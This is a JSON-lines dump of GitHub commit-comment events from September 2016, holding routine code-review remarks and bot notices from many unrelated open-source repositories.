{"id":"4541456645","type":"CommitCommentEvent","actor":{"login":"beck"},"repo":{"name":"yola/classlist-polyfill"},"payload":{"comment":{"id":18966863,"position":null,"line":null,"path":null,"commit_id":"41a8847fcf084fa1237fe85e87594bd522bee08f","created_at":"2016-09-09T17:52:56Z","updated_at":"2016-09-09T17:52:56Z","body":"Yeah, I was dumb and didn't realize there is an upstream.  I'm thinking maybe it best to close our repo and reopen as a proper fork."}},"created_at":"2016-09-09T17:52:56Z"}
{"id":"4541459122","type":"CommitCommentEvent","actor":{"login":"mrocklin"},"repo":{"name":"jcrist/distributed"},"payload":{"comment":{"id":18966870,"position":34,"line":1634,"path":"distributed/scheduler.py","commit_id":"c1dac9dabfb966df55c124259a4f3c10592aa596","created_at":"2016-09-09T17:53:26Z","updated_at":"2016-09-09T17:53:26Z","body":"It's nice to avoid deserialization in the scheduler"}},"created_at":"2016-09-09T17:53:26Z"}
{"id":"4541459322","type":"CommitCommentEvent","actor":{"login":"fritsch"},"repo":{"name":"xbmc/xbmc"},"payload":{"comment":{"id":18966872,"position":201,"line":959,"path":"xbmc/cores/AudioEngine/Sinks/AESinkWASAPI.cpp","commit_id":"ba4830514e335a21fd79567e670b70707b9ef683","created_at":"2016-09-09T17:53:27Z","updated_at":"2016-09-09T17:53:27Z","body":"Jep, makes sense.\n\nAm 09.09.2016 7:45 nachm. schrieb \"Rainer Hochecker\" <\nnotifications@github.com>:\n\n> IMO it is better leaving things undone (broken) as in an undefined state,\n> which it is when only compile tested by jenkins. Then everybody is aware of\n> what still needs to be done. A comment \"// Fixme\" at the end of a line it\n> not very helpful\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/xbmc/xbmc/commit/ba4830514e335a21fd79567e670b70707b9ef683#commitcomment-18966722>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABCfHfItbViuSHbPMsUeCX4uDo_tM0xKks5qoZsmgaJpZM4J4znj>\n> .\n>\n"}},"created_at":"2016-09-09T17:53:27Z"}
{"id":"4541462199","type":"CommitCommentEvent","actor":{"login":"vutran"},"repo":{"name":"vutran/dext"},"payload":{"comment":{"id":18966878,"position":17,"line":14,"path":".editorconfig","commit_id":"d1600bdbb4deb4ba28ba2aac4d5ad4441be5adeb","created_at":"2016-09-09T17:54:04Z","updated_at":"2016-09-09T17:54:04Z","body":"Kind of late, but is there a specific scenario in which we would need trailing whitespace on markdown files?"}},"created_at":"2016-09-09T17:54:04Z"}
{"id":"4541466308","type":"CommitCommentEvent","actor":{"login":"DanTheMan827"},"repo":{"name":"DanTheMan827/NTR_Forwarder"},"payload":{"comment":{"id":18966887,"position":null,"line":null,"path":null,"commit_id":"650801c86d7e24b406ad26161bb965d1e190e7ed","created_at":"2016-09-09T17:54:55Z","updated_at":"2016-09-09T17:54:55Z","body":"I'll give that a try then"}},"created_at":"2016-09-09T17:54:55Z"}
{"id":"4541468986","type":"CommitCommentEvent","actor":{"login":"seanho00"},"repo":{"name":"sermons/reveal-skel"},"payload":{"comment":{"id":18966893,"position":null,"line":null,"path":null,"commit_id":"5cc16733597f4597294961b0357351491f9147c5","created_at":"2016-09-09T17:55:27Z","updated_at":"2016-09-09T17:55:27Z","body":"Working on #8"}},"created_at":"2016-09-09T17:55:27Z"}
{"id":"4541469395","type":"CommitCommentEvent","actor":{"login":"tamarazuk"},"repo":{"name":"woothemes/woocommerce"},"payload":{"comment":{"id":18966894,"position":null,"line":null,"path":null,"commit_id":"e2d206421d8b47adc622e4e56d72e939da48ca71","created_at":"2016-09-09T17:55:33Z","updated_at":"2016-09-09T17:55:33Z","body":"@claudiosmweb i agree with @bekarice \r\n\r\nWhile WC validities `99999-999`, `99.999-999` and `99999999` for Brazil (likely because all are valid formats), it should be saving it in one format so integrations can always expect to see a specific format and work with it from there."}},"created_at":"2016-09-09T17:55:33Z"}
{"id":"4541470681","type":"CommitCommentEvent","actor":{"login":"seanho00"},"repo":{"name":"sermons/reveal-skel"},"payload":{"comment":{"id":18966897,"position":null,"line":null,"path":null,"commit_id":"08728f900ea3c3c4f8b2b6195b170e5a47783807","created_at":"2016-09-09T17:55:50Z","updated_at":"2016-09-09T17:55:50Z","body":"Working on #8"}},"created_at":"2016-09-09T17:55:50Z"}
{"id":"4541471192","type":"CommitCommentEvent","actor":{"login":"mzhelskiy"},"repo":{"name":"mgp25/Instagram-API"},"payload":{"comment":{"id":18966899,"position":9,"line":73,"path":"src/http/Response/UsernameInfoResponse.php","commit_id":"0bb7a35e6c4ab3a23b23f17cf6b305064ce83dbf","created_at":"2016-09-09T17:55:57Z","updated_at":"2016-09-09T17:55:57Z","body":"is_verified?"}},"created_at":"2016-09-09T17:55:57Z"}
{"id":"4541473456","type":"CommitCommentEvent","actor":{"login":"NachoSoto"},"repo":{"name":"ReactiveCocoa/ReactiveCocoa"},"payload":{"comment":{"id":18966904,"position":null,"line":null,"path":null,"commit_id":"8d5f963f0705c849b9574fcdd5033426be16b3d8","created_at":"2016-09-09T17:56:25Z","updated_at":"2016-09-09T17:56:25Z","body":"Yup! These are some of what I meant, but also all the deployment targets."}},"created_at":"2016-09-09T17:56:25Z"}
{"id":"4541476203","type":"CommitCommentEvent","actor":{"login":"luoldrigues"},"repo":{"name":"jbavari/cordova-plugin-video-editor"},"payload":{"comment":{"id":18966917,"position":null,"line":null,"path":null,"commit_id":"fe59d24cb9e25d60d83d3b4eb046b34350ebb8aa","created_at":"2016-09-09T17:57:00Z","updated_at":"2016-09-09T17:57:00Z","body":"Great job @lsilvs!! Now it's working properly! Thank you!"}},"created_at":"2016-09-09T17:57:00Z"}
{"id":"4541476543","type":"CommitCommentEvent","actor":{"login":"Haxk20"},"repo":{"name":"silver13/h8mini-testing"},"payload":{"comment":{"id":18966919,"position":null,"line":null,"path":null,"commit_id":"d6363393b38ed5029911a9a3e2a1fc309cfe7088","created_at":"2016-09-09T17:57:05Z","updated_at":"2016-09-09T17:57:05Z","body":"Well i dont see it its says no devices found  the same app im curious if there is need of some modifications to the quad or only flash your firmware and you have BLE????"}},"created_at":"2016-09-09T17:57:05Z"}
{"id":"4541478145","type":"CommitCommentEvent","actor":{"login":"Haxk20"},"repo":{"name":"silver13/h8mini-testing"},"payload":{"comment":{"id":18966922,"position":null,"line":null,"path":null,"commit_id":"d6363393b38ed5029911a9a3e2a1fc309cfe7088","created_at":"2016-09-09T17:57:23Z","updated_at":"2016-09-09T17:57:23Z","body":"Modifications like hardware stuff"}},"created_at":"2016-09-09T17:57:23Z"}
{"id":"4541488268","type":"CommitCommentEvent","actor":{"login":"claudiosmweb"},"repo":{"name":"woothemes/woocommerce"},"payload":{"comment":{"id":18966938,"position":null,"line":null,"path":null,"commit_id":"e2d206421d8b47adc622e4e56d72e939da48ca71","created_at":"2016-09-09T17:59:28Z","updated_at":"2016-09-09T17:59:28Z","body":"@tamarazuk but we save for Brazil in only one format :P\r\n"}},"created_at":"2016-09-09T17:59:28Z"}
{"id":"4541492302","type":"CommitCommentEvent","actor":{"login":"SuslikV"},"repo":{"name":"jp9000/obs-studio"},"payload":{"comment":{"id":18966946,"position":null,"line":null,"path":null,"commit_id":"39592ff5ebb9aa641ae460b7c044e3fc1cc0196f","created_at":"2016-09-09T18:00:17Z","updated_at":"2016-09-09T18:00:17Z","body":"If we had a lamp to know what camera is online now... Highlight the window with red rectangle via overlay. That overlay would not captured by OBS Studio itself. Possible improvement?"}},"created_at":"2016-09-09T18:00:17Z"}
{"id":"4541494227","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":18966951,"position":null,"line":null,"path":null,"commit_id":"5ac3837725960a56261dbb4d6f183a11eb993f4f","created_at":"2016-09-09T18:00:39Z","updated_at":"2016-09-09T18:00:39Z","body":"The following doc(s) have been deployed to the [slashzerop](https://slashzerop-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/migrate-wordpress](https://slashzerop-static-docs.pantheonsite.io/docs/migrate-wordpress)\n"}},"created_at":"2016-09-09T18:00:39Z"}
{"id":"4541496440","type":"CommitCommentEvent","actor":{"login":"PuercoPop"},"repo":{"name":"proyectosdeley/proyectos_de_ley_scraper"},"payload":{"comment":{"id":18966960,"position":null,"line":null,"path":null,"commit_id":"5fd15f7f11c33ef252e23b6338733db556b82a1c","created_at":"2016-09-09T18:01:04Z","updated_at":"2016-09-09T18:01:04Z","body":"Si estoy entendiendo bien el problema es que la extension del archivo puede ser pdf/PDF/etc. Otra manera es hacer que el match sea case insensitve, se puede hacer pasandole al método search search más abajo la opcion `re.IGNORECASE` o en la misma regexp con la opcion i (`(?i)<regexp>`)"}},"created_at":"2016-09-09T18:01:04Z"}
{"id":"4541503620","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18966976,"position":null,"line":null,"path":null,"commit_id":"83929b99aba34dcece1bf2f8535364118af45e83","created_at":"2016-09-09T18:02:23Z","updated_at":"2016-09-09T18:02:23Z","body":"os_2.0_develop_signal_slot_bug (kbenne) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-83929b99aba34dcece1bf2f8535364118af45e83-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-83929b99aba34dcece1bf2f8535364118af45e83-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-09T18:02:23Z"}
{"id":"4541503847","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18966977,"position":null,"line":null,"path":null,"commit_id":"f6278e6809d748253c9794ca4c2f24762e253f48","created_at":"2016-09-09T18:02:26Z","updated_at":"2016-09-09T18:02:26Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#GxY8d_mxSkyiN3N_GONKOg"}},"created_at":"2016-09-09T18:02:26Z"}
{"id":"4541504846","type":"CommitCommentEvent","actor":{"login":"stephanenicolas"},"repo":{"name":"cchacin/android-jackson"},"payload":{"comment":{"id":18966978,"position":null,"line":null,"path":null,"commit_id":"5b5e05eaf8f2fae79b5db3d9cbe0ae305848ee27","created_at":"2016-09-09T18:02:34Z","updated_at":"2016-09-09T18:02:34Z","body":"Not sure I get the bug here... I am not sure about the guava classes behavior neither, we don't use on android, it's just too big."}},"created_at":"2016-09-09T18:02:34Z"}
{"id":"4541506308","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18967007,"position":null,"line":null,"path":null,"commit_id":"4d35b4442e6218f2937e9feb938ec92a7dec1e3b","created_at":"2016-09-09T18:02:50Z","updated_at":"2016-09-09T18:02:50Z","body":"@Sami32 I think it's important that if there is information/documentation it is correct and meaningful. I actually prefer no information over wrong information, as wrong information can lead to so much misunderstandings and wasted time. Any references to ```BufferOutputFile.java``` is meaningless to the users for example, and it's meaningless to me too until I read and understand what that class does."}},"created_at":"2016-09-09T18:02:50Z"}
{"id":"4541507540","type":"CommitCommentEvent","actor":{"login":"FernetMenta"},"repo":{"name":"xbmc/xbmc"},"payload":{"comment":{"id":18967012,"position":201,"line":959,"path":"xbmc/cores/AudioEngine/Sinks/AESinkWASAPI.cpp","commit_id":"ba4830514e335a21fd79567e670b70707b9ef683","created_at":"2016-09-09T18:03:05Z","updated_at":"2016-09-09T18:03:05Z","body":"Don't get me wrong. I don't blame anyone, just trying to learn. Eventually it was me who pushed the button on this change :)"}},"created_at":"2016-09-09T18:03:05Z"}
{"id":"4541508978","type":"CommitCommentEvent","actor":{"login":"carlosp420"},"repo":{"name":"proyectosdeley/proyectos_de_ley_scraper"},"payload":{"comment":{"id":18967027,"position":null,"line":null,"path":null,"commit_id":"5fd15f7f11c33ef252e23b6338733db556b82a1c","created_at":"2016-09-09T18:03:21Z","updated_at":"2016-09-09T18:03:21Z","body":"verdad no? case insensitive iría mejor. No hay mucha consistencia en la manera de nombrar sus PDF. Hay que esperar lo inesperado."}},"created_at":"2016-09-09T18:03:21Z"}
{"id":"4541510315","type":"CommitCommentEvent","actor":{"login":"carlosp420"},"repo":{"name":"proyectosdeley/proyectos_de_ley_scraper"},"payload":{"comment":{"id":18967028,"position":null,"line":null,"path":null,"commit_id":"5fd15f7f11c33ef252e23b6338733db556b82a1c","created_at":"2016-09-09T18:03:37Z","updated_at":"2016-09-09T18:03:37Z","body":"te animas a hacer un pull request?"}},"created_at":"2016-09-09T18:03:37Z"}
{"id":"4541511958","type":"CommitCommentEvent","actor":{"login":"bennn"},"repo":{"name":"nuprl/cs2500-server"},"payload":{"comment":{"id":18967031,"position":37,"line":37,"path":"bin/email-passwords.rkt","commit_id":"f0eb9389b7086c0f9a02b7deb0530d5d80cc7893","created_at":"2016-09-09T18:03:57Z","updated_at":"2016-09-09T18:03:57Z","body":"This list is ignored. We should at least print a reminder after sending the email."}},"created_at":"2016-09-09T18:03:57Z"}
{"id":"4541513829","type":"CommitCommentEvent","actor":{"login":"tamarazuk"},"repo":{"name":"woothemes/woocommerce"},"payload":{"comment":{"id":18967036,"position":null,"line":null,"path":null,"commit_id":"e2d206421d8b47adc622e4e56d72e939da48ca71","created_at":"2016-09-09T18:04:20Z","updated_at":"2016-09-09T18:04:20Z","body":"@claudiosmweb yes, that's what i meant. It does save it one format only as it should 😸  I was suggesting the same for US postcodes. Integrations can expect them to be either `12345` or `12345-1234` and nothing else. Leads to less confusion. "}},"created_at":"2016-09-09T18:04:20Z"}
{"id":"4541515240","type":"CommitCommentEvent","actor":{"login":"mullender"},"repo":{"name":"cchacin/android-jackson"},"payload":{"comment":{"id":18967042,"position":null,"line":null,"path":null,"commit_id":"5b5e05eaf8f2fae79b5db3d9cbe0ae305848ee27","created_at":"2016-09-09T18:04:38Z","updated_at":"2016-09-09T18:04:38Z","body":"The issue is that the hashcode of your mutable object changes after you put it in the set. So you won't be able to find it anymore. Line 25 will fail."}},"created_at":"2016-09-09T18:04:38Z"}
{"id":"4541516815","type":"CommitCommentEvent","actor":{"login":"Grz3s"},"repo":{"name":"unified-db/Database"},"payload":{"comment":{"id":18967045,"position":null,"line":null,"path":null,"commit_id":"60176ec0cc7b006216bbf25b3ded9c2e485403d2","created_at":"2016-09-09T18:04:57Z","updated_at":"2016-09-09T18:04:57Z","body":"@xfurry nice to see you again...\r\nall you need is there:\r\nhttps://github.com/unified-db/Database/issues/130"}},"created_at":"2016-09-09T18:04:57Z"}
{"id":"4541517118","type":"CommitCommentEvent","actor":{"login":"Iamblichos"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":18967047,"position":null,"line":null,"path":null,"commit_id":"9b4e0a1a1373f8e1fa451de2d1d3b411d52ed431","created_at":"2016-09-09T18:05:02Z","updated_at":"2016-09-09T18:05:02Z","body":"Got a CTD on second turn:\r\n\r\n![image](https://cloud.githubusercontent.com/assets/14372214/18397475/02ebf264-768e-11e6-9ded-f7901c12094d.png)\r\n"}},"created_at":"2016-09-09T18:05:02Z"}
{"id":"4541519112","type":"CommitCommentEvent","actor":{"login":"rich-reactor8"},"repo":{"name":"dtk/dtk-server"},"payload":{"comment":{"id":18967051,"position":16,"line":84,"path":"application/model/common_module/update/base_service.rb","commit_id":"fdea7c1e80d5cc33b7c4f075543a23bd7e421beb","created_at":"2016-09-09T18:05:26Z","updated_at":"2016-09-09T18:05:26Z","body":"Need to fix this up. The call 'service_module.get_module_branches.first' is non-detremistic if multiple branches"}},"created_at":"2016-09-09T18:05:26Z"}
{"id":"4541519331","type":"CommitCommentEvent","actor":{"login":"bennn"},"repo":{"name":"nuprl/cs2500-server"},"payload":{"comment":{"id":18967054,"position":31,"line":31,"path":"bin/email-passwords.rkt","commit_id":"f0eb9389b7086c0f9a02b7deb0530d5d80cc7893","created_at":"2016-09-09T18:05:29Z","updated_at":"2016-09-09T18:05:29Z","body":"\"An early morning walk is a blessing for the whole day\" --Henry David Thoreau"}},"created_at":"2016-09-09T18:05:29Z"}
{"id":"4541522583","type":"CommitCommentEvent","actor":{"login":"cchacin"},"repo":{"name":"cchacin/android-jackson"},"payload":{"comment":{"id":18967071,"position":null,"line":null,"path":null,"commit_id":"5b5e05eaf8f2fae79b5db3d9cbe0ae305848ee27","created_at":"2016-09-09T18:06:11Z","updated_at":"2016-09-09T18:06:11Z","body":"@stephanenicolas @mullender I push another commit removing Guava to be more clear"}},"created_at":"2016-09-09T18:06:11Z"}
{"id":"4541524743","type":"CommitCommentEvent","actor":{"login":"claudiosmweb"},"repo":{"name":"woothemes/woocommerce"},"payload":{"comment":{"id":18967078,"position":null,"line":null,"path":null,"commit_id":"e2d206421d8b47adc622e4e56d72e939da48ca71","created_at":"2016-09-09T18:06:35Z","updated_at":"2016-09-09T18:06:35Z","body":"@tamarazuk problem already solved :P"}},"created_at":"2016-09-09T18:06:35Z"}
{"id":"4541527161","type":"CommitCommentEvent","actor":{"login":"PuercoPop"},"repo":{"name":"proyectosdeley/proyectos_de_ley_scraper"},"payload":{"comment":{"id":18967090,"position":null,"line":null,"path":null,"commit_id":"5fd15f7f11c33ef252e23b6338733db556b82a1c","created_at":"2016-09-09T18:07:04Z","updated_at":"2016-09-09T18:07:04Z","body":"Ok"}},"created_at":"2016-09-09T18:07:04Z"}
{"id":"4541537229","type":"CommitCommentEvent","actor":{"login":"Phil365"},"repo":{"name":"Phil365/JamNation"},"payload":{"comment":{"id":18967121,"position":null,"line":null,"path":null,"commit_id":"6a08f2c8ead8dbd135d553d66aaf81b72c40f03c","created_at":"2016-09-09T18:09:07Z","updated_at":"2016-09-09T18:09:07Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;f1ixuywc&#x2F;1-en-tant-que-designer-j-aimerais-avoir-acces-au-backend-du-site-web\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> En tant que designer, j&#39;aimerais avoir accès au backend du site Web.</a>"}},"created_at":"2016-09-09T18:09:07Z"}
{"id":"4541537314","type":"CommitCommentEvent","actor":{"login":"Phil365"},"repo":{"name":"Phil365/JamNation"},"payload":{"comment":{"id":18967122,"position":null,"line":null,"path":null,"commit_id":"6a08f2c8ead8dbd135d553d66aaf81b72c40f03c","created_at":"2016-09-09T18:09:08Z","updated_at":"2016-09-09T18:09:08Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;f1ixuywc&#x2F;1-en-tant-que-designer-j-aimerais-avoir-acces-au-backend-du-site-web\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> En tant que designer, j&#39;aimerais avoir accès au backend du site Web.</a>"}},"created_at":"2016-09-09T18:09:08Z"}
{"id":"4541537477","type":"CommitCommentEvent","actor":{"login":"Phil365"},"repo":{"name":"Phil365/JamNation"},"payload":{"comment":{"id":18967123,"position":null,"line":null,"path":null,"commit_id":"6a08f2c8ead8dbd135d553d66aaf81b72c40f03c","created_at":"2016-09-09T18:09:09Z","updated_at":"2016-09-09T18:09:09Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;f1ixuywc&#x2F;1-en-tant-que-designer-j-aimerais-avoir-acces-au-backend-du-site-web\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> En tant que designer, j&#39;aimerais avoir accès au backend du site Web.</a>"}},"created_at":"2016-09-09T18:09:09Z"}
{"id":"4541537507","type":"CommitCommentEvent","actor":{"login":"Phil365"},"repo":{"name":"Phil365/JamNation"},"payload":{"comment":{"id":18967124,"position":null,"line":null,"path":null,"commit_id":"6a08f2c8ead8dbd135d553d66aaf81b72c40f03c","created_at":"2016-09-09T18:09:09Z","updated_at":"2016-09-09T18:09:09Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;f1ixuywc&#x2F;1-en-tant-que-designer-j-aimerais-avoir-acces-au-backend-du-site-web\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> En tant que designer, j&#39;aimerais avoir accès au backend du site Web.</a>"}},"created_at":"2016-09-09T18:09:09Z"}
{"id":"4541538304","type":"CommitCommentEvent","actor":{"login":"kentonv"},"repo":{"name":"meteor/meteor"},"payload":{"comment":{"id":18967127,"position":null,"line":null,"path":null,"commit_id":"26d082b62ef6f6d92e80f69f18b6bede65bd7e98","created_at":"2016-09-09T18:09:17Z","updated_at":"2016-09-09T18:09:17Z","body":"Just in time. Thanks!"}},"created_at":"2016-09-09T18:09:17Z"}
{"id":"4541538445","type":"CommitCommentEvent","actor":{"login":"woliveiras"},"repo":{"name":"abc-dev/2016"},"payload":{"comment":{"id":18967128,"position":49,"line":70,"path":"src/index.html","commit_id":"8e04d819ebe32aa89518ef4685220b6ca4cc661c","created_at":"2016-09-09T18:09:19Z","updated_at":"2016-09-09T18:09:19Z","body":"😱 \r\n\r\nValeu @felquis "}},"created_at":"2016-09-09T18:09:19Z"}
{"id":"4541544017","type":"CommitCommentEvent","actor":{"login":"TheComputerGuy96"},"repo":{"name":"ishantvivek/android_device_samsung_kylepro"},"payload":{"comment":{"id":18967137,"position":null,"line":null,"path":null,"commit_id":"3004462f2785daf0f3a112a718350d7bbe5b543f","created_at":"2016-09-09T18:10:23Z","updated_at":"2016-09-09T18:10:23Z","body":"Note: Change \"WCDMA Only\" to \"WCDMA only\" and \"WCDMA/GSM preferred\" to \"GSM/WCDMA preferred\""}},"created_at":"2016-09-09T18:10:23Z"}
{"id":"4541546654","type":"CommitCommentEvent","actor":{"login":"ishantvivek"},"repo":{"name":"ishantvivek/android_device_samsung_kylepro"},"payload":{"comment":{"id":18967142,"position":null,"line":null,"path":null,"commit_id":"3004462f2785daf0f3a112a718350d7bbe5b543f","created_at":"2016-09-09T18:10:54Z","updated_at":"2016-09-09T18:10:54Z","body":"And why?"}},"created_at":"2016-09-09T18:10:54Z"}
{"id":"4541546701","type":"CommitCommentEvent","actor":{"login":"NTaxi5"},"repo":{"name":"NTaxi5/COMMIT"},"payload":{"comment":{"id":18967143,"position":null,"line":null,"path":null,"commit_id":"1746dae1a18577020037239db44851388fbf1429","created_at":"2016-09-09T18:10:55Z","updated_at":"2016-09-09T18:10:55Z","body":"Commit 2"}},"created_at":"2016-09-09T18:10:55Z"}
{"id":"4541548455","type":"CommitCommentEvent","actor":{"login":"Erin-Mounts"},"repo":{"name":"Sage-Bionetworks/Bridge-iOS-SDK"},"payload":{"comment":{"id":18967149,"position":28,"line":66,"path":"BridgeSDK/BridgeSDK.m","commit_id":"3cb76d430df98073c62eb644a860468d44b4f5b5","created_at":"2016-09-09T18:11:18Z","updated_at":"2016-09-09T18:11:18Z","body":"should be SBBDefaultCacheDaysBehind?"}},"created_at":"2016-09-09T18:11:18Z"}
{"id":"4541561998","type":"CommitCommentEvent","actor":{"login":"burukinsd"},"repo":{"name":"dok1qq/.NetLabs"},"payload":{"comment":{"id":18967187,"position":16,"line":16,"path":"StarWars/StartWars.cs","commit_id":"77730025ecf90f30851eebbaa2becd061cc7a3c8","created_at":"2016-09-09T18:13:55Z","updated_at":"2016-09-09T18:13:55Z","body":"Не много докапываюсь, но все же... Convert.ToInt32(a[i]) дергать два раза не очень хорошо."}},"created_at":"2016-09-09T18:13:55Z"}
{"id":"4541562024","type":"CommitCommentEvent","actor":{"login":"schuster"},"repo":{"name":"nuprl/cs2500-server"},"payload":{"comment":{"id":18967188,"position":null,"line":null,"path":null,"commit_id":"f0eb9389b7086c0f9a02b7deb0530d5d80cc7893","created_at":"2016-09-09T18:13:55Z","updated_at":"2016-09-09T18:13:55Z","body":"Which list are you referring to? I'm not sure what you mean."}},"created_at":"2016-09-09T18:13:55Z"}
{"id":"4541562322","type":"CommitCommentEvent","actor":{"login":"ExSport"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18967192,"position":null,"line":null,"path":null,"commit_id":"f9669b34d7203692aa165c5ec71ecd2c541aa177","created_at":"2016-09-09T18:13:59Z","updated_at":"2016-09-09T18:13:59Z","body":"So then maybe it will be useful to mention it when user will enable it so he will expect there is a \"side effect\" of  STEREO downconverting what right now description in UMS doesn't tell.\r\nE.g. renderers with audio-passthrough can accept any mime/content type (2.0 for 5.1 content) but decoder used is in external receiver which doesn't receive and doesn't need this info.\r\nSo user should be warned/informed :)"}},"created_at":"2016-09-09T18:13:59Z"}
{"id":"4541562813","type":"CommitCommentEvent","actor":{"login":"fritsch"},"repo":{"name":"xbmc/xbmc"},"payload":{"comment":{"id":18967194,"position":201,"line":959,"path":"xbmc/cores/AudioEngine/Sinks/AESinkWASAPI.cpp","commit_id":"ba4830514e335a21fd79567e670b70707b9ef683","created_at":"2016-09-09T18:14:05Z","updated_at":"2016-09-09T18:14:05Z","body":"Nope :-) I said really what I thought. The Statement was fully right.\nKeeping it compiled does not mean it is verified and tested.\n\nAm 09.09.2016 8:03 nachm. schrieb \"Rainer Hochecker\" <\nnotifications@github.com>:\n\nDon't get me wrong. I don't blame anyone, just trying to learn. Eventually\nit was me who pushed the button on this change :)\n\n—\nYou are receiving this because you commented.\nReply to this email directly, view it on GitHub\n<https://github.com/xbmc/xbmc/commit/ba4830514e335a21fd79567e670b70707b9ef683#commitcomment-18967012>,\nor mute the thread\n<https://github.com/notifications/unsubscribe-auth/ABCfHYdV7RGn0EIKRqVlkHnqtVs1gkzXks5qoZ9fgaJpZM4J4znj>\n.\n"}},"created_at":"2016-09-09T18:14:05Z"}
{"id":"4541563112","type":"CommitCommentEvent","actor":{"login":"LoneGazebo"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":18967196,"position":null,"line":null,"path":null,"commit_id":"dee7a217f715d399ce5e73660346b44976c660cd","created_at":"2016-09-09T18:14:10Z","updated_at":"2016-09-09T18:14:10Z","body":"I don't actually see assignstartingplots.lua for the CP/CBO/EUI/No-EUI files. Did you include it?"}},"created_at":"2016-09-09T18:14:10Z"}
{"id":"4541563133","type":"CommitCommentEvent","actor":{"login":"NTaxi5"},"repo":{"name":"NTaxi5/COMMIT"},"payload":{"comment":{"id":18967197,"position":1,"line":1,"path":"README.md","commit_id":"1746dae1a18577020037239db44851388fbf1429","created_at":"2016-09-09T18:14:10Z","updated_at":"2016-09-09T18:14:10Z","body":"Commit Version 2\r\n"}},"created_at":"2016-09-09T18:14:10Z"}
{"id":"4541567196","type":"CommitCommentEvent","actor":{"login":"burukinsd"},"repo":{"name":"dok1qq/.NetLabs"},"payload":{"comment":{"id":18967208,"position":10,"line":10,"path":"StarWars/StartWars.cs","commit_id":"77730025ecf90f30851eebbaa2becd061cc7a3c8","created_at":"2016-09-09T18:14:56Z","updated_at":"2016-09-09T18:14:56Z","body":"Тоже докапываюсь, но... откуда желание объявить все перемнные вначале, да еще и в одной строке? Вроде никто не говорил что на Паскале писал :) "}},"created_at":"2016-09-09T18:14:56Z"}
{"id":"4541569876","type":"CommitCommentEvent","actor":{"login":"UlasevichVi"},"repo":{"name":"UlasevichVi/1-Laba"},"payload":{"comment":{"id":18967216,"position":null,"line":null,"path":null,"commit_id":"ace6e0d9c6abc76f92f4b4464bffa7a33a879de4","created_at":"2016-09-09T18:15:25Z","updated_at":"2016-09-09T18:15:25Z","body":"ghbdtn"}},"created_at":"2016-09-09T18:15:25Z"}
{"id":"4541574199","type":"CommitCommentEvent","actor":{"login":"pyllyukko"},"repo":{"name":"pyllyukko/harden.sh"},"payload":{"comment":{"id":18967226,"position":null,"line":null,"path":null,"commit_id":"eacceb9a11ec231dbd2b6adca0078343496bb365","created_at":"2016-09-09T18:16:16Z","updated_at":"2016-09-09T18:16:16Z","body":"All right! Automated CIS audit with 277 checks went from 58% failed (baseline) down to 31% failed with ```harden.sh -q```."}},"created_at":"2016-09-09T18:16:16Z"}
{"id":"4541577426","type":"CommitCommentEvent","actor":{"login":"jmcphers"},"repo":{"name":"rstudio/rstudio"},"payload":{"comment":{"id":18967237,"position":6,"line":128,"path":"src/cpp/session/modules/rmarkdown/NotebookExec.cpp","commit_id":"487867deff2be06aeedb22a647610dbaff1cc0ec","created_at":"2016-09-09T18:16:58Z","updated_at":"2016-09-09T18:16:58Z","body":"Can `fig.asp` compute width from height as well? \r\n\r\nWe could also go so far as to support `fig.asp` as an override for our own default aspect ratio (~1.6). "}},"created_at":"2016-09-09T18:16:58Z"}
{"id":"4541582217","type":"CommitCommentEvent","actor":{"login":"stephanenicolas"},"repo":{"name":"cchacin/android-jackson"},"payload":{"comment":{"id":18967250,"position":null,"line":null,"path":null,"commit_id":"5b5e05eaf8f2fae79b5db3d9cbe0ae305848ee27","created_at":"2016-09-09T18:17:49Z","updated_at":"2016-09-09T18:17:49Z","body":"I see. Yes, sure the buck won't change ;) good one, but I had never faced it before."}},"created_at":"2016-09-09T18:17:49Z"}
